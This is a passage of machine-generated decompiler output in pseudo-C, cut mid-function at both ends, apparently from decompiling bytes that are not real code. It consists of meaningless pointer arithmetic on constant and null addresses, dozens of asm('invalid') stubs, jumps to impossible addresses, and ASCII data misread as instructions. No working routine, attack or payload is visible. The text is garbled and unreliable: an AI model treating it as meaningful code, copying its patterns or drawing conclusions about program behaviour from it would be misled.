        										 *_t1646 =  *_t1646 + _t1646;
        										 *((intOrPtr*)(_t1646 + 0x73694c00)) =  *((intOrPtr*)(_t1646 + 0x73694c00)) + _t1646;
        										goto L21;
        									} else {
        										asm("outsd");
        										asm("outsb");
        										_t1646 = _t1641 ^  *_t1641;
        										_push(es);
        										 *_t1664 =  *_t1664 + _t1664;
        										_t20 = _t1664 + 0x70;
        										 *_t20 =  *((intOrPtr*)(_t1664 + 0x70)) + _t1646;
        										if( *_t20 < 0) {
        											L21:
        											_t1806 = _t1806 - 1;
        											_t1788 =  *(_t1650 + 0x74) * 0x4080031;
        										} else {
        											_t1801 =  *(_t1650 + 0x61) * 0x5006974;
        											asm("sbb [edi], eax");
        											_t1650 = _t1650 | _t1664;
        											 *_t1769 =  *_t1769 + _t1769;
        											_t1102 = _t1646 + 0x2a03ff00;
        											 *_t1102 =  *_t1102 + _t1102;
        											 *_t1769 =  *_t1769 + _t1102;
        											goto L12;
        										}
        									}
        								}
        							}
        						}
        					}
        				}
        				_t1108 = _t1107 + 1;
        				 *_t1108 =  *_t1108 + _t1108;
        				 *_t1108 =  *_t1108 + _t1108;
        				_t1652 = _t1650 + _t1650;
        				asm("invalid");
        				asm("invalid");
        				asm("invalid");
        				 *_t1108 =  *_t1108 + 1;
        				 *_t1108 =  *_t1108 + _t1108;
        				 *_t1777 =  *_t1777 + _t1652;
        				_t1109 = _t1108 + 1;
        				 *((intOrPtr*)(_t1109 + 0x40e0)) =  *((intOrPtr*)(_t1109 + 0x40e0)) + _t1769;
        				 *_t1109 =  *_t1109 + _t1109;
        				 *_t1109 =  *_t1109 + _t1652;
        				 *0x28 = 0x28 +  *0x28;
        				 *0x28 = 0x28 +  *0x28;
        				 *0x28 = 0x28 +  *0x28;
        				 *0x28 = 0x28 +  *0x28;
        				 *0x28 = 0x28 +  *0x28;
        				 *0x28 = 0x28 +  *0x28;
        				 *0x28 = 0x28 +  *0x28;
        				_push(ss);
        				 *_t1664 =  *_t1664 + 0x29;
        				 *_t1769 =  *_t1769 + 0x29;
        				 *((intOrPtr*)(0x29)) =  *((intOrPtr*)(0x29)) + _t1664;
        				 *((intOrPtr*)(0)) =  *((intOrPtr*)(0));
        				asm("invalid");
        				asm("invalid");
        				asm("invalid");
        				asm("invalid");
        				 *((intOrPtr*)(0)) =  *((intOrPtr*)(0));
        				 *((intOrPtr*)(0)) =  *((intOrPtr*)(0));
        				asm("loopne 0x42");
        				 *((intOrPtr*)(0)) =  *((intOrPtr*)(0));
        				 *((intOrPtr*)(0)) =  *((intOrPtr*)(0));
        				 *((intOrPtr*)(0)) =  *((intOrPtr*)(0)) + _t1652;
        				 *((intOrPtr*)(0)) =  *((intOrPtr*)(0));
        				 *((intOrPtr*)(0)) =  *((intOrPtr*)(0));
        				 *((intOrPtr*)(0)) =  *((intOrPtr*)(0));
        				 *((intOrPtr*)(0)) =  *((intOrPtr*)(0));
        				 *((intOrPtr*)(0)) =  *((intOrPtr*)(0));
        				 *((intOrPtr*)(0)) =  *((intOrPtr*)(0));
        				 *0x00000016 =  *((intOrPtr*)(0x16)) + 0x28;
        				 *_t1664 =  *_t1664 + 1;
        				 *0x28 =  *0x28 + 1;
        				 *((intOrPtr*)(1)) =  *((intOrPtr*)(1)) + _t1664;
        				 *((intOrPtr*)(0)) =  *((intOrPtr*)(0));
        				asm("invalid");
        				asm("invalid");
        				asm("invalid");
        				asm("invalid");
        				 *((intOrPtr*)(0)) =  *((intOrPtr*)(0));
        				 *((intOrPtr*)(0)) =  *((intOrPtr*)(0));
        				asm("in al, dx");
        				 *((intOrPtr*)(1)) =  *((intOrPtr*)(1)) + 1;
        				 *((intOrPtr*)(1)) =  *((intOrPtr*)(1)) + 1;
        				 *((intOrPtr*)(0x29)) =  *((intOrPtr*)(0x29)) + 0x29;
        				 *((intOrPtr*)(0x29)) =  *((intOrPtr*)(0x29)) + 0x29;
        				 *((intOrPtr*)(0x29)) =  *((intOrPtr*)(0x29)) + 0x29;
        				 *((intOrPtr*)(0x29)) =  *((intOrPtr*)(0x29)) + 0x29;
        				 *((intOrPtr*)(0x29)) =  *((intOrPtr*)(0x29)) + 0x29;
        				 *((intOrPtr*)(0x29)) =  *((intOrPtr*)(0x29)) + 0x29;
        				 *0x0100403F =  *((intOrPtr*)(0x100403f)) + 0x28;
        				 *0x00000052 =  *((intOrPtr*)(0x52)) + 0x29;
        				 *0x40 =  *0x40 | 0x00000028;
        				 *((intOrPtr*)(0x29)) =  *((intOrPtr*)(0x29)) + 0x29;
        				asm("invalid");
        				asm("invalid");
        				asm("invalid");
        				asm("invalid");
        				 *((intOrPtr*)(0x29)) =  *((intOrPtr*)(0x29)) + 0x29;
        				 *((intOrPtr*)(0x29)) =  *((intOrPtr*)(0x29)) + 0x29;
        				asm("sbb al, 0x26");
        				 *0x0000000A =  *((intOrPtr*)(0xa)) + 0x28;
        				 *0x0000002B =  *((intOrPtr*)(0x2b)) + 0x2b;
        				 *((intOrPtr*)(0x2b)) =  *((intOrPtr*)(0x2b)) + 0x2b;
        				 *0x000028DE =  *((intOrPtr*)(0x28de)) + _t1664;
        				 *((intOrPtr*)(0x2b)) =  *((intOrPtr*)(0x2b)) + 0x2b;
        				 *((intOrPtr*)(0x2b)) =  *((intOrPtr*)(0x2b)) + 0x2b;
        				 *((intOrPtr*)(0x2b)) =  *((intOrPtr*)(0x2b)) + 0x2b;
        				 *((intOrPtr*)(0x2b)) =  *((intOrPtr*)(0x2b)) + 0x2b;
        				 *((intOrPtr*)(0x2b)) =  *((intOrPtr*)(0x2b)) + 0x2b;
        				_t1121 = 0x2b + _t1664 + 1;
        				 *_t1664 =  *_t1664 + _t1121;
        				 *0x40250800 =  *0x40250800 + _t1121;
        				 *_t1121 =  *_t1121 + _t1121;
        				 *_t1121 =  *_t1121 + _t1121;
        				asm("invalid");
        				asm("invalid");
        				asm("invalid");
        				 *_t1121 =  *_t1121 + 1;
        				 *_t1121 =  *_t1121 + _t1121;
        				 *((intOrPtr*)(0x40 + _t1788)) =  *((intOrPtr*)(0x40 + _t1788)) + _t1664;
        				 *((intOrPtr*)(_t1121 - 0x20)) =  *((intOrPtr*)(_t1121 - 0x20)) + 0x28;
        				_t1122 = _t1121 + 1;
        				 *_t1122 =  *_t1122 + _t1122;
        				 *_t1122 =  *_t1122 + _t1122;
        				 *_t1122 =  *_t1122 + _t1664;
        				 *_t1122 =  *_t1122 + _t1122;
        				 *_t1122 =  *_t1122 + _t1122;
        				 *_t1122 =  *_t1122 + _t1122;
        				 *_t1122 =  *_t1122 + _t1122;
        				 *_t1122 =  *_t1122 + _t1122;
        				 *_t1122 =  *_t1122 + _t1122;
        				 *_t1122 =  *_t1122 + _t1122;
        				ss = ss;
        				_t1123 = _t1122 + 1;
        				 *_t1664 =  *_t1664 + _t1123;
        				 *_t1788 =  *_t1788 + _t1123;
        				 *_t1123 =  *_t1123 + _t1664;
        				_t1124 = _t1123 & 0x00000040;
        				 *_t1124 =  *_t1124 + _t1124;
        				asm("invalid");
        				asm("invalid");
        				asm("invalid");
        				asm("invalid");
        				 *_t1124 =  *_t1124 + _t1124;
        				 *_t1124 =  *_t1124 + _t1124;
        				if( *_t1124 >= 0) {
        					_t1636 = _t1124 + 1;
        					 *((intOrPtr*)(_t1636 - 0x20)) =  *((intOrPtr*)(_t1636 - 0x20)) + 0x28;
        					_t1637 = _t1636 + 1;
        					 *_t1637 =  *_t1637 + _t1637;
        					 *_t1637 =  *_t1637 + _t1637;
        					 *((intOrPtr*)(_t1637 + 0x28b2)) =  *((intOrPtr*)(_t1637 + 0x28b2)) + _t1664;
        					 *_t1637 =  *_t1637 + _t1637;
        					 *_t1637 =  *_t1637 + _t1637;
        					 *_t1637 =  *_t1637 + _t1637;
        					 *_t1637 =  *_t1637 + _t1637;
        					 *_t1637 =  *_t1637 + _t1637;
        					 *_t1637 =  *_t1637 + 0x28;
        					_pop(ss);
        					_t1638 = _t1637 + 1;
        					 *_t1664 =  *_t1664 + _t1638;
        					 *_t1777 =  *_t1777 + _t1638;
        					 *_t1638 =  *_t1638 + _t1664;
        					_t1124 = _t1638 & 0x00000040;
        				}
        				 *_t1124 =  *_t1124 + _t1124;
        				 *_t1124 =  *_t1124 + _t1124;
        				asm("invalid");
        				asm("invalid");
        				asm("invalid");
        				asm("invalid");
        				 *_t1124 =  *_t1124 + _t1124;
        				 *_t1124 =  *_t1124 + _t1124;
        				asm("lodsb");
        				_t1125 = _t1124 + 1;
        				 *((intOrPtr*)(_t1125 + 0x40e0)) =  *((intOrPtr*)(_t1125 + 0x40e0)) + _t1125;
        				 *_t1125 =  *_t1125 + _t1125;
        				 *((intOrPtr*)(_t1125 - 0x4d)) =  *((intOrPtr*)(_t1125 - 0x4d)) + 0x28;
        				 *_t1125 =  *_t1125 - _t1125;
        				 *_t1125 =  *_t1125 + _t1125;
        				 *_t1125 =  *_t1125 + _t1125;
        				 *_t1125 =  *_t1125 + _t1125;
        				 *_t1125 =  *_t1125 + _t1125;
        				 *_t1125 =  *_t1125 + _t1125;
        				 *_t1125 =  *_t1125 + _t1125;
        				if( *_t1125 >= 0) {
        					_t1635 = _t1125 + 1;
        					 *_t1664 =  *_t1664 + _t1635;
        					 *_t1635 =  *_t1635 + _t1664;
        					 *_t1635 =  *_t1635 + _t1664;
        					_t1125 = _t1635 & 0x00000040;
        					 *_t1125 =  *_t1125 + _t1125;
        					asm("invalid");
        					asm("invalid");
        					asm("invalid");
        					asm("invalid");
        					 *_t1125 =  *_t1125 + _t1125;
        				}
        				 *_t1125 =  *_t1125 + _t1125;
        				_t1127 = _t1125 + 0x29;
        				 *((intOrPtr*)(_t1127 + 0x40e0)) =  *((intOrPtr*)(_t1127 + 0x40e0)) + 0x28;
        				 *_t1127 =  *_t1127 + _t1127;
        				 *((intOrPtr*)(_t1127 + 0x28b3)) =  *((intOrPtr*)(_t1127 + 0x28b3)) + 0x28;
        				 *_t1127 =  *_t1127 + _t1127;
        				 *_t1127 =  *_t1127 + _t1127;
        				 *_t1127 =  *_t1127 + _t1127;
        				 *_t1127 =  *_t1127 + _t1127;
        				 *_t1127 =  *_t1127 + _t1127;
        				 *((intOrPtr*)(_t1127 + 0x1004017)) =  *((intOrPtr*)(_t1127 + 0x1004017)) + _t1664;
        				 *_t1664 =  *_t1664 + _t1664;
        				 *_t1127 =  *_t1127 + _t1664;
        				_t1128 = _t1127 & 0x00000040;
        				 *_t1128 =  *_t1128 + _t1128;
        				asm("invalid");
        				asm("invalid");
        				asm("invalid");
        				asm("invalid");
        				 *_t1128 =  *_t1128 + _t1128;
        				 *_t1128 =  *_t1128 + _t1128;
        				_t1130 = (_t1128 | 0x00000027) + 1;
        				 *((intOrPtr*)(_t1130 + 0x40e0)) =  *((intOrPtr*)(_t1130 + 0x40e0)) + _t1130;
        				 *_t1130 =  *_t1130 + _t1130;
        				 *_t1130 =  *_t1130 + 0x28;
        				 *0x28 = 0x28 +  *0x28;
        				 *0x28 = 0x28 +  *0x28;
        				 *0x28 = 0x28 +  *0x28;
        				 *0x28 = 0x28 +  *0x28;
        				 *0x28 = 0x28 +  *0x28;
        				 *0x28 = 0x28 +  *0x28;
        				_pop(ss);
        				 *_t1664 =  *_t1664 + 0x51;
        				 *_t1664 = 0x28 +  *_t1664;
        				 *((intOrPtr*)(0x51)) =  *((intOrPtr*)(0x51)) + _t1664;
        				 *0x00000040 =  *((intOrPtr*)(0x40)) + 0x40;
        				asm("invalid");
        				asm("invalid");
        				asm("invalid");
        				asm("invalid");
        				 *((intOrPtr*)(0x40)) =  *((intOrPtr*)(0x40)) + 0x40;
        				 *((intOrPtr*)(0x40)) =  *((intOrPtr*)(0x40)) + 0x40;
        				 *((intOrPtr*)(0x40)) = gs;
        				 *0x00000041 =  *((intOrPtr*)(0x41)) + 0x28;
        				asm("loope 0x42");
        				 *((intOrPtr*)(0x41)) =  *((intOrPtr*)(0x41)) + 0x41;
        				 *((intOrPtr*)(0x41)) =  *((intOrPtr*)(0x41)) + 0x41;
        				_t1136 = 0x41 + _t1664;
        				 *_t1136 =  *_t1136 + _t1136;
        				 *_t1136 =  *_t1136 + _t1136;
        				 *_t1136 =  *_t1136 + _t1136;
        				 *_t1136 =  *_t1136 + _t1136;
        				 *_t1136 =  *_t1136 + _t1136;
        				 *_t1136 =  *_t1136 + _t1136;
        				 *_t1136 = 0x28 +  *_t1136;
        				asm("sbb [eax], al");
        				 *_t1136 =  *_t1136 + _t1136;
        				_t1137 = _t1136 |  *_t1136;
        				 *0x40 =  *0x40 | 0x00000028;
        				 *_t1137 =  *_t1137 + _t1137;
        				asm("invalid");
        				asm("invalid");
        				asm("invalid");
        				asm("invalid");
        				 *_t1137 =  *_t1137 + _t1137;
        				 *_t1137 =  *_t1137 + _t1137;
        				asm("insb");
        				asm("daa");
        				_t1139 = _t1137 + 1 + _t1137 + 1;
        				asm("loopne 0x42");
        				 *_t1139 =  *_t1139 + _t1139;
        				 *_t1139 =  *_t1139 + _t1139;
        				_t1140 = _t1139 + 0x28;
        				 *_t1140 =  *_t1140 + _t1140;
        				 *_t1140 =  *_t1140 + _t1140;
        				 *_t1140 =  *_t1140 + _t1140;
        				 *_t1140 =  *_t1140 + _t1140;
        				 *_t1140 =  *_t1140 + _t1140;
        				 *_t1140 =  *_t1140 + _t1140;
        				 *((intOrPtr*)(_t1140 + 0x18)) =  *((intOrPtr*)(_t1140 + 0x18)) + 0x28;
        				_t1141 = _t1140 + 1;
        				 *0x28 =  *0x28 + _t1141;
        				 *((intOrPtr*)(_t1141 + _t1141)) =  *((intOrPtr*)(_t1141 + _t1141)) + 0x28;
        				 *0x40 =  *0x40 | 0x00000028;
        				 *_t1141 =  *_t1141 + _t1141;
        				asm("invalid");
        				asm("invalid");
        				asm("invalid");
        				asm("invalid");
        				 *_t1141 =  *_t1141 + _t1141;
        				 *_t1141 =  *_t1141 + _t1141;
        				asm("pushfd");
        				asm("daa");
        				_t1143 = _t1141 + 0x29;
        				asm("loopne 0x42");
        				 *_t1143 =  *_t1143 + _t1143;
        				 *_t1143 =  *_t1143 + _t1143;
        				 *((intOrPtr*)(_t1143 - 0x4d)) =  *((intOrPtr*)(_t1143 - 0x4d)) + 0x28;
        				 *_t1143 =  *_t1143 - _t1143;
        				 *_t1143 =  *_t1143 + _t1143;
        				 *_t1143 =  *_t1143 + _t1143;
        				 *_t1143 =  *_t1143 + _t1143;
        				 *_t1143 =  *_t1143 + _t1143;
        				 *_t1143 =  *_t1143 + _t1143;
        				 *_t1143 =  *_t1143 + _t1143;
        				 *_t1143 = 0x28;
        				_t1144 = _t1143 + 1;
        				 *0x28 =  *0x28 + _t1144;
        				 *0x40250800 =  *0x40250800 + 0x28;
        				 *_t1144 =  *_t1144 + _t1144;
        				 *_t1144 =  *_t1144 + _t1144;
        				asm("invalid");
        				asm("invalid");
        				asm("invalid");
        				 *_t1144 =  *_t1144 + 1;
        				 *_t1144 =  *_t1144 + _t1144;
        				asm("daa");
        				_t1147 = _t1144 + 0x29 + _t1144 + 0x29;
        				asm("loopne 0x42");
        				 *_t1147 =  *_t1147 + _t1147;
        				 *_t1147 =  *_t1147 + _t1147;
        				_t1148 = _t1147 + 0x28;
        				 *_t1148 =  *_t1148 + _t1148;
        				 *_t1148 =  *_t1148 + _t1148;
        				 *_t1148 =  *_t1148 + _t1148;
        				 *_t1148 =  *_t1148 + _t1148;
        				 *_t1148 =  *_t1148 + _t1148;
        				 *_t1148 =  *_t1148 + _t1148;
        				_t1149 = _t1148 + _t1148;
        				asm("sbb [eax], al");
        				 *_t1149 =  *_t1149 + _t1149;
        				_push(cs);
        				 *_t1149 =  *_t1149 + 0x28;
        				_t1150 = _t1149 & 0x00000040;
        				 *_t1150 =  *_t1150 + _t1150;
        				asm("invalid");
        				asm("invalid");
        				asm("invalid");
        				asm("invalid");
        				 *_t1150 =  *_t1150 + _t1150;
        				 *_t1150 =  *_t1150 + _t1150;
        				asm("cld");
        				asm("daa");
        				_t1152 = _t1150 + 0x29;
        				asm("loopne 0x42");
        				 *_t1152 =  *_t1152 + _t1152;
        				 *_t1152 =  *_t1152 + _t1152;
        				 *0x28 = 0x28 +  *0x28;
        				 *0x28 = 0x28 +  *0x28;
        				 *0x28 = 0x28 +  *0x28;
        				 *0x28 = 0x28 +  *0x28;
        				 *0x28 = 0x28 +  *0x28;
        				 *0x28 = 0x28 +  *0x28;
        				asm("sbb [eax], al");
        				 *0x00000078 =  *((intOrPtr*)(0x78)) + 0x78;
        				asm("str word [eax]");
        				 *((intOrPtr*)(0x40)) =  *((intOrPtr*)(0x40)) + 0x40;
        				asm("invalid");
        				asm("invalid");
        				asm("invalid");
        				asm("invalid");
        				 *((intOrPtr*)(0x40)) =  *((intOrPtr*)(0x40)) + 0x40;
        				 *((intOrPtr*)(0x40)) =  *((intOrPtr*)(0x40)) + 0x40;
        				 *0x00000019 =  *((intOrPtr*)(0x19)) + 0x19;
        				asm("loope 0x42");
        				 *((intOrPtr*)(0x19)) =  *((intOrPtr*)(0x19)) + 0x19;
        				 *((intOrPtr*)(0x19)) =  *((intOrPtr*)(0x19)) + 0x19;
        				 *0x28 = 0x28 +  *0x28;
        				 *0x28 = 0x28 +  *0x28;
        				 *0x28 = 0x28 +  *0x28;
        				 *0x28 = 0x28 +  *0x28;
        				 *0x28 = 0x28 +  *0x28;
        				 *0x28 = 0x28 +  *0x28;
        				 *0x28 = 0x28 +  *0x28;
        				asm("sbb [eax], eax");
        				 *0x28 = 0x28 +  *0x28;
        				asm("adc [eax], al");
        				 *0x40 =  *0x40 | 0x00000028;
        				 *0x28 = 0x28 +  *0x28;
        				asm("invalid");
        				asm("invalid");
        				asm("invalid");
        				asm("invalid");
        				 *0x28 = 0x28 +  *0x28;
        				 *0x28 = 0x28 +  *0x28;
        				 *0x28 =  *0x28 - 0x28;
        				asm("adc cl, ah");
        				 *((intOrPtr*)(0x29)) =  *((intOrPtr*)(0x29)) + 0x29;
        				 *((intOrPtr*)(0x29)) =  *((intOrPtr*)(0x29)) + 0x29;
        				 *0x000028DD =  *((intOrPtr*)(0x28dd)) + 0x28;
        				 *((intOrPtr*)(0x29)) =  *((intOrPtr*)(0x29)) + 0x29;
        				 *((intOrPtr*)(0x29)) =  *((intOrPtr*)(0x29)) + 0x29;
        				 *((intOrPtr*)(0x29)) =  *((intOrPtr*)(0x29)) + 0x29;
        				 *((intOrPtr*)(0x29)) =  *((intOrPtr*)(0x29)) + 0x29;
        				 *((intOrPtr*)(0x29)) =  *((intOrPtr*)(0x29)) + 0x29;
        				 *0x00000042 =  *((intOrPtr*)(0x42)) + 0x28;
        				 *0x28 =  *0x28 + 0x2a;
        				 *0x28 = 0x28 +  *0x28;
        				 *((intOrPtr*)(0x2a)) =  *((intOrPtr*)(0x2a)) + 0x28;
        				 *((intOrPtr*)(0)) =  *((intOrPtr*)(0));
        				asm("invalid");
        				asm("invalid");
        				asm("invalid");
        				asm("invalid");
        				 *((intOrPtr*)(0)) =  *((intOrPtr*)(0));
        				 *((intOrPtr*)(0)) =  *((intOrPtr*)(0));
        				asm("loope 0x42");
        				 *((intOrPtr*)(0)) =  *((intOrPtr*)(0));
        				 *((intOrPtr*)(0)) =  *((intOrPtr*)(0));
        				 *0xFFFFFFFFFFFFFFB4 =  *((intOrPtr*)(0xffffffffffffffb4)) + 0x50;
        				 *((intOrPtr*)(0)) =  *((intOrPtr*)(0));
        				 *((intOrPtr*)(0)) =  *((intOrPtr*)(0));
        				 *((intOrPtr*)(0)) =  *((intOrPtr*)(0));
        				 *((intOrPtr*)(0)) =  *((intOrPtr*)(0));
        				 *((intOrPtr*)(0)) =  *((intOrPtr*)(0));
        				 *((intOrPtr*)(0)) =  *((intOrPtr*)(0));
        				 *((intOrPtr*)(0)) =  *((intOrPtr*)(0));
        				_t1164 =  *0x1004019;
        				 *((intOrPtr*)(0x50)) =  *((intOrPtr*)(0x50)) + 0x28;
        				 *_t1164 =  *_t1164 + 0x28;
        				_t1165 = _t1164 & 0x00000040;
        				 *_t1165 =  *_t1165 + _t1165;
        				asm("invalid");
        				asm("invalid");
        				asm("invalid");
        				asm("invalid");
        				 *_t1165 =  *_t1165 + _t1165;
        				 *_t1165 =  *_t1165 + _t1165;
        				asm("in al, dx");
        				 *_t1165 =  *_t1165 - _t1165;
        				_t1166 = _t1165 + 1;
        				asm("loope 0x42");
        				 *_t1166 =  *_t1166 + _t1166;
        				 *_t1166 =  *_t1166 + _t1166;
        				_t1167 = _t1166 + 0x50;
        				 *_t1167 =  *_t1167 + _t1167;
        				 *_t1167 =  *_t1167 + _t1167;
        				 *_t1167 =  *_t1167 + _t1167;
        				 *_t1167 =  *_t1167 + _t1167;
        				 *_t1167 =  *_t1167 + _t1167;
        				 *_t1167 =  *_t1167 + _t1167;
        				_t1168 = _t1167 + 0x50;
        				asm("sbb [eax], eax");
        				 *_t1168 =  *_t1168 + _t1168;
        				asm("adc al, 0x0");
        				 *0x40 =  *0x40 | 0x00000028;
        				 *_t1168 =  *_t1168 + _t1168;
        				asm("invalid");
        				asm("invalid");
        				asm("invalid");
        				asm("invalid");
        				 *_t1168 =  *_t1168 + _t1168;
        				 *_t1168 =  *_t1168 + _t1168;
        				asm("sbb al, 0x29");
        				_t1169 = _t1168 + 1;
        				 *((intOrPtr*)(_t1169 - 0x1f)) =  *((intOrPtr*)(_t1169 - 0x1f)) + 0x28;
        				_t1170 = _t1169 + 1;
        				 *_t1170 =  *_t1170 + _t1170;
        				 *_t1170 =  *_t1170 + _t1170;
        				 *_t1170 =  *_t1170 + 0x50;
        				_t1667 = 0x28;
        				 *_t1170 =  *_t1170 + _t1170;
        				 *_t1170 =  *_t1170 + _t1170;
        				 *_t1170 =  *_t1170 + _t1170;
        				 *_t1170 =  *_t1170 + _t1170;
        				 *_t1170 =  *_t1170 + _t1170;
        				 *_t1170 =  *_t1170 + _t1170;
        				 *_t1170 =  *_t1170 + 0x28;
        				asm("sbb al, [eax]");
        				 *_t1170 =  *_t1170 + _t1170;
        				asm("adc eax, 0x40250800");
        				 *_t1170 =  *_t1170 + _t1170;
        				 *_t1170 =  *_t1170 + _t1170;
        				asm("invalid");
        				asm("invalid");
        				asm("invalid");
        				 *_t1170 =  *_t1170 + 1;
        				 *_t1170 =  *_t1170 + _t1170;
        				 *((intOrPtr*)(0x28 +  &_a64)) =  *((intOrPtr*)(0x28 +  &_a64)) + 0x28;
        				 *((intOrPtr*)(_t1170 - 0x1f)) =  *((intOrPtr*)(_t1170 - 0x1f)) + 0x28;
        				_t1171 = _t1170 + 1;
        				 *_t1171 =  *_t1171 + _t1171;
        				 *_t1171 =  *_t1171 + _t1171;
        				 *((intOrPtr*)(_t1171 - 0x4b)) =  *((intOrPtr*)(_t1171 - 0x4b)) + 0xa0;
        				 *_t1171 =  *_t1171 - _t1171;
        				 *_t1171 =  *_t1171 + _t1171;
        				 *_t1171 =  *_t1171 + _t1171;
        				 *_t1171 =  *_t1171 + _t1171;
        				 *_t1171 =  *_t1171 + _t1171;
        				 *_t1171 =  *_t1171 + _t1171;
        				 *_t1171 =  *_t1171 + _t1171;
        				asm("sbb al, [eax]");
        				_push(_t1788);
        				_t1773 = 0x29;
        				_t1173 = _t1171 - 0x00000001 ^ 0x2a263621;
        				 *_t1173 =  *_t1173 + _t1173;
        				 *_t1173 =  *_t1173 + _t1173;
        				 *_t1173 =  *_t1173 + _t1173;
        				 *_t1173 =  *_t1173 + _t1173;
        				 *_t1173 =  *_t1173 + _t1173;
        				 *_t1173 =  *_t1173 + _t1173;
        				 *_t1788 =  *_t1788 + 0xa0;
        				 *_t1173 =  *_t1173 + _t1173;
        				 *_t1173 =  *_t1173 + _t1173;
        				 *_t1173 =  *_t1173 + _t1173;
        				 *_t1173 =  *_t1173 + _t1173;
        				 *_t1173 =  *_t1173 + _t1173;
        				 *_t1173 =  *_t1173 + _t1173;
        				_push(cs);
        				_t1175 = _t1173 |  *_t1173;
        				 *_t1175 =  *_t1175 + _t1175;
        				 *_t1175 =  *_t1175 + _t1175;
        				 *_t1175 =  *_t1175 + _t1175;
        				 *_t1175 =  *_t1175 + _t1175;
        				 *_t1175 =  *_t1175 + 0x29;
        				asm("sbb eax, 0xf1d00040");
        				 *0x28 =  *0x28 ^ _t1175;
        				_t1658 = 0xa0;
        				asm("invalid");
        				 *_t1175 =  *_t1175 | _t1175;
        				 *_t1175 =  *_t1175 + _t1175;
        				 *_t1175 =  *_t1175 + _t1175;
        				 *_t1175 =  *_t1175 + _t1175;
        				_t1176 = _t1175 +  *_t1175;
        				 *_t1176 =  *_t1176 + _t1176;
        				goto 0xe0401a95;
        				asm("sbb al, [eax]");
        				asm("loopne 0x17");
        				_t1177 = _t1176 + 1;
        				 *0x0132DC16 =  *((intOrPtr*)(0x132dc16)) + 0xa0;
        				 *_t1177 =  *_t1177 + _t1177;
        				if ( *_t1177 > 0) goto L43;
        				 *_t1177 =  *_t1177 + _t1177;
        				_t1178 =  *_t1177;
        				 *_t1178 =  &(_t1178[ *_t1178]);
        				_t1179 =  *_t1178;
        				 *_t1179 =  *_t1179 + _t1179;
        				 *_t1179 =  *_t1179 + _t1179;
        				 *_t1179 =  *_t1179 + _t1179;
        				 *_t1179 =  *_t1179 + _t1179;
        				 *_t1179 =  *_t1179 + _t1179;
        				while(1) {
        					 *_t1179 =  *_t1179 + _t1179;
        					 *_t1179 =  *_t1179 + _t1179;
        					 *_t1179 =  *_t1179 + _t1179;
        					 *_t1179 =  *_t1179 + _t1179;
        					_t99 = _t1788 + 0x61;
        					 *_t99 =  *((intOrPtr*)(_t1788 + 0x61)) + _t1667;
        					if( *_t99 < 0) {
        						goto L51;
        					}
        					asm("outsd");
        					_t1179 = _t1179 ^  *_t1179;
        					asm("outsb");
        					asm("outsd");
        					asm("outsb");
        					if(_t1179 <= 0) {
        						L49:
        						 *_t1179 =  *_t1179 + _t1179;
        						L50:
        						 *((intOrPtr*)(_t1773 - 0x7f)) =  *((intOrPtr*)(_t1773 - 0x7f)) + _t1658;
        					} else {
        						asm("a16 jz 0x65");
        						asm("bound eax, [eax]");
        						_t101 = _t1788 + 0x6f;
        						 *_t101 =  *((intOrPtr*)(_t1788 + 0x6f)) + _t1667;
        						asm("outsb");
        						if( *_t101 <= 0) {
        							L52:
        							_t1777 = 0x95a51afa;
        						} else {
        							asm("a16 jz 0x65");
        							asm("bound eax, [eax]");
        							 *_t1179 =  *_t1179 + _t1179;
        							_push(_t1179);
        							 *_t1179 =  *_t1179 + _t1179;
        							_t1667 = _t1667 + _t1667;
        							if(_t1667 <= 0) {
        								asm("popfd");
        								_t1179 = _t1179 | 0xfffffffffefffeff;
        								asm("retf 0x8e");
        								 *_t1179 =  *_t1179 + _t1179;
        								 *_t1179 =  *_t1179 + _t1179;
        								 *_t1179 =  *_t1179 + _t1179;
        								 *_t1179 =  *_t1179 + _t1179;
        								 *_t1179 =  *_t1179 + _t1179;
        								 *_t1179 =  *_t1179 + _t1179;
        								 *_t1179 =  *_t1179 + _t1179;
        								 *_t1179 =  *_t1179 + _t1179;
        								 *_t1179 =  *_t1179 + _t1179;
        								 *((intOrPtr*)(_t1179 + 3)) =  *((intOrPtr*)(_t1179 + 3)) + _t1773;
        								 *_t1179 =  *_t1179 + _t1179;
        								 *_t1179 =  *_t1179 + _t1179;
        								 *_t1179 =  *_t1179 + _t1179;
        								 *_t1179 =  *_t1179 + _t1179;
        								 *_t1179 =  *_t1179 + _t1179;
        								 *_t1179 =  *_t1179 + _t1179;
        								 *_t1179 =  *_t1179 + _t1179;
        								 *_t1179 =  *_t1179 + _t1179;
        								 *_t1179 =  *_t1179 + _t1179;
        								_t1773 = _t1773 + _t1658;
        								 *_t1179 =  *_t1179 + _t1179;
        								 *_t1179 =  *_t1179 + _t1179;
        								 *_t1179 =  *_t1179 + _t1179;
        								 *_t1179 =  *_t1179 + _t1179;
        								asm("adc al, 0x40");
        								 *((intOrPtr*)(_t1179 + _t1179)) =  *((intOrPtr*)(_t1179 + _t1179)) + _t1667;
        								 *_t1179 =  *_t1179 + _t1773;
        								goto L49;
        							}
        						}
        					}
        					 *_t1179 =  *_t1179 + _t1179;
        					 *_t1179 =  *_t1179 + _t1179;
        					 *_t1179 =  *_t1179 + _t1179;
        					 *_t1179 =  *_t1179 + _t1179;
        					 *_t1179 =  *_t1179 + _t1179;
        					 *_t1179 =  *_t1179 + _t1179;
        					 *_t1179 =  *_t1179 + _t1179;
        					 *_t1179 =  *_t1179 + _t1179;
        					 *_t1179 =  *_t1179 + _t1179;
        					 *_t1179 =  *_t1179;
        					 *_t1179 =  *_t1179 + _t1179;
        					 *_t1179 =  *_t1179 + _t1179;
        					 *_t1179 =  *_t1179 + _t1179;
        					 *_t1179 =  *_t1179 + _t1179;
        					 *_t1179 =  *_t1179 + _t1179;
        					 *_t1179 =  *_t1179 + _t1179;
        					 *_t1179 =  *_t1179 + _t1179;
        					 *_t1179 =  *_t1179 + _t1179;
        					 *_t1179 =  *_t1179 + _t1179;
        					 *_t1179 =  *_t1179 + _t1179;
        					_t1658 = _t1658 + _t1179;
        					if (_t1658 >= 0) goto L54;
        					 *_t1179 =  *_t1179 + _t1179;
        					 *_t1179 =  *_t1179 + _t1179;
        					asm("das");
        					_t1179 = _t1179 + _t1179 + 1;
        					 *((intOrPtr*)(_t1179 + _t1179 + 0x10000)) =  *((intOrPtr*)(_t1179 + _t1179 + 0x10000)) + _t1658;
        					 *_t1179 =  *_t1179 + _t1179;
        					 *0x40 =  *0x40 | _t1179;
        					 *_t1179 =  *_t1179 + _t1179;
        					if( *_t1179 < 0) {
        						goto L50;
        					}
        					_t1181 = _t1179 + 1;
        					_t1659 = _t1658 + _t1658;
        					asm("invalid");
